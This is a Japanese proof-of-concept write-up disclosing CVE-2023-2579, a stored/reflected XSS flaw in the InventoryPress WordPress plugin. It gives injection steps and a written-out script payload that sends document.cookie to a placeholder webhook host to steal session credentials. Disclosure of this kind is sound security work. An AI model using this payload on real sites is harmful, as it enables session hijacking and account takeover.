
CVE-2023-2579 の PoC
CVE-2023-2579 ID が予約され、PoC が WPScan ウェブサイトで公開されました: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe
タイトル: WordPress CMS 用 InventoryPress プラグインにおける認証済み反射型クロスサイトスクリプティング
日付: 2023-04-21
著者: Danilo Albuquerque
ベンダーホームページ: https://wordpress.org
ソフトウェアリンク: https://wordpress.org/download
バージョン: WordPress 6.2
プラグイン名とバージョン: InventoryPress 1.7
テスト環境: Brave (バージョン 1.50.119 Chromium: 112.0.5615.121 (公式ビルド) 64ビット)
これらすべてを行い、現在のページを更新すると、メッセージを含むアラートポップアップが表示されます。
在庫にアイテムを追加できるページに移動します:

フォームの「説明」入力欄に悪意のあるペイロードを追加します:

プラグインによって生成された新しいアイテムのリンクにアクセスします:

リクエストが完了すると、アラートポップアップが表示されます:

以下のペイロードを「説明」入力欄に追加してクッキーを盗みます: <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>。その後、新しいアイテムを投稿するか、既存のアイテムを更新します。
Webhook サイトでトリガーし、認証情報を取得します。
ペイロードを追加し、アイテムを投稿(または更新)します:

トリガーと認証情報の取得:
